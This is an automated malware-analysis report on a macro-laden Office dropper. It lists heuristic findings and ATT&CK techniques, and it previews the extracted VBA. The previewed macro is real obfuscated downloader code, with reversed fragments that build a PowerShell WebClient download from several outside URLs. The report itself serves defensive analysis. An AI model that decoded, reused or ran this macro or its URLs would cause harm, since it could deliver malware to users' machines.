MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, indicated by multiple heuristic firings including 'OLE_VBA_MACROS' and 'OLE_VBA_AUTOOPEN'. The 'macros.bas' script is heavily obfuscated but appears to construct and execute URLs, likely to download a second-stage payload. The presence of an AutoOpen macro suggests it executes automatically upon opening, aligning with a spearphishing attachment attack vector.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6582330-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6582330-0
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 172,032 bytes but its declared streams total only 36,009 bytes — 136,023 bytes (79%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 22221 bytes |
SHA-256: 3e2579c95e33a670b0182fec9d62a4027dc339bed59467e61f16ea623b4b9f81 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "pOVZoXimBk"
Sub wSBnl(LBPhmM)
For zVAlrP = 55659 To XOCnZC
iztabP = bjiuaY + CDate(69091) + pCBucT + 44742 * ulHOYE / Sin(98486) + LdVWS / Sgn(76785) * (23133 + CDate(71184))
Next
Set OuRCz = EEsZzm
End Sub
Function oAPtKpKwl()
On Error Resume Next
For aWGDzp = 38156 To KXjhi
CMNBqQ = OYFrww + CDate(5613) + jizOj + 7279 * QOoWRL / Sin(7903) + hUOsC / Sgn(84434) * (60305 + CDate(45719))
Next
Set VvLwB = CtQri
For qNwACq = 85362 To uLBii
tfIjN = kYwwF + CDate(87419) + WTAoZ + 2010 * SLsiF / Sin(11894) + hrUwib / Sgn(40908) * (55582 + CDate(96140))
Next
Set MLlHRP = vJiWzt
VVzkapI = bjPCY("7V13+'e.q'+'3'+'D( '+'+ '+'BS'+'NMBN'+' + '+'q3DwK'+'hq'+'3D + '+'cilbu'+'p:vneM'+'B'+'N ='+' '+'C'+'DSM'+'BN;)q'+'3D@q3D(ti'+'lpS.q3D/skjj/'+'hc'+'.ocubm'+'a//'+':ptth@/C'+'X0o/ku.'+'o'+'c.in'+'imh'+'szS", 31071 + 3 - 31071, 31071 + 198 - 31071)
For bdXoi = 74919 To aHSChd
aRmtVU = OPAAws + CDate(74927) + XYkzzX + 3400 * juLFl / Sin(6876) + EklBU / Sgn(84189) * (92666 + CDate(56202))
Next
Set ZuMNXo = undkuS
For rLzJW = 10990 To iOziK
cnbJLw = pWQVJu + CDate(34794) + TlzzX + 68199 * BdGNa / Sin(85207) + fwAhw / Sgn(64087) * (56976 + CDate(59505))
Next
Set JaHZV = iAbnNP
cXDOjljjTsi = bjPCY("hMF6'+'ptth@'+'/z2UtN0X'+'/'+'moc.essidab/'+'/:ptth'+'@/7mggB'+'k'+'/uh.e'+'keyn'+'rok-n'+'o'+'talab'+'/'+'/:ptth '+' q3D = XC'+'DAMBN;'+')33'+'1'+'2'+'82 ,0'+'00'+'01(txen.dsad'+'asn'+'MBN = '+'BS4h", 69653 + 3 - 69653, 69653 + 193 - 69653)
For zimqKl = 95415 To wYkjq
Vcwkd = dpYQJw + CDate(10851) + FmmiqD + 1582 * uFXrh / Sin(7160) + CXpid / Sgn(17612) * (46694 + CDate(56630))
Next
Set kazHK = hNjzw
For wiQTuL = 27247 To cowMD
HoIjR = YuEwjB + CDate(81580) + pWZfI + 34181 * EHdPHq / Sin(36225) + fiuYBU / Sgn(50578) * (55529 + CDate(19734))
Next
Set JVEaR = sVuSFO
SajdJCAuzk = bjPCY("Ui@N('+')q3D'+'m'+'etI-eq'+'3D+'+'q3D'+'kq'+'3'+'D'+'+q3Dov'+'nIrkkaB", 23133 + 6 - 23133, 23133 + 61 - 23133)
For EmrCh = 58612 To JuGwZ
mcozO = PZwvZi + CDate(81071) + WmvAqQ + 34941 * mKRtwt / Sin(92358) + PGBBz / Sgn(31008) * (63148 + CDate(89518))
Next
Set MzqFq = YrmuX
For PMpPOl = 89577 To zRLGSC
ChoiS = NiFHB + CDate(79593) + LRDGPI + 86786 * AGzJq / Sin(85898) + RLwBT / Sgn(784) * (63467 + CDate(6862))
Next
Set CjTBd = IMvQli
jNHZiXw = bjPCY("Z@1wMnitt'+'o'+u5b", 97930 + 4 - 97930, 97930 + 9 - 97930)
For FrJJC = 3852 To pUcdtQ
IAWdiN = Dfpro + CDate(33504) + mOZGmE + 11253 * rKzfc / Sin(22734) + HpHMpz / Sgn(22827) * (48813 + CDate(76512))
Next
Set ULBMU = OkcCG
For riYXGC = 22967 To mVjKlw
iQqRt = CzmmT + CDate(77966) + MjiEpp + 59339 * tMAjH / Sin(96919) + QAjjk / Sgn(47644) * (85341 + CDate(21861))
Next
Set GiPpl = lnNOkF
SrZbUC = bjPCY("4Gq3D(&;)CDS'+'MBN'+' '+',)(tM'+'4gNeFnie'+'FnrtSoTtM4.cfsa'+'MBN('+'t'+'M4ele'+'FnIFda'+'Oe'+'Fnl'+'n'+'We'+'FnoDt'+'M4.UYIu0zPpB", 6860 + 8 - 6860, 6860 + 121 - 6860)
For cUvREo = 6525 To imOjhm
kEYTV = wHZpV + CDate(15625) + NVsNNY + 46577 * nSUEH / Sin(38263) + vBFDz / Sgn(66067) * (5084 + CDate(17503))
Next
Set RjWiMV = jjbcMt
For PuHfpC = 38416 To SAzaMK
roRKZb = KpNqq + CDate(47603) + uBkLJc + 19246 * afhLwA / Sin(82749) + hBzdJi / Sgn(9802) * (76197 + CDate(60827))
Next
Set wkSRw = vHYzN
ujPTMzUDz = bjPCY("UwZ5ufNM'+'BN;'+'tnei'+'lCbeW.teN.met'+'syS )'+'q3'+'D'+'tcejbo'+'-q'+'3D+q'+'3Dwq3'+'D'+'+q'+'3De'+'nq'+'3D'+'(.'+' ='+' U'+'YY'+'MBN;m'+'3", 2179 + 2 - 2179, 2179 + 133 - 2179)
For CilGN = 73913 To OfSTFf
qviMvw = vfZSJj + CDate(40375) + pcrWS + 98113 * sCUSK / Sin(33662) + iRMlJV / Sgn(99705) * (47881 + CDate(21911))
Next
Set QjGDL = EFIzpp
For NaOwLb = 59562 To dtmTPC
vWkZas = uaYpn + CDate(12453) + jFMBbZ + 7426 * wAvnr / Sin(75272) + HAzOdC / Sgn(61746) * (36965 + CDate(89407))
Next
Set EDfoZW = YBwnaR
YpkbbuCj = bjPCY("u4j'cs//:p'+'tth@/'+'7r'+'UAWp/rb.ite.a'+'r'+'ievi'+'lo'+'l'+'einad'jPO5B", 52771 + 6 - 52771, 52771 + 65 - 52771)
For dvhYji = 75094 To WESXs
dfAmS = WVYZY +
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.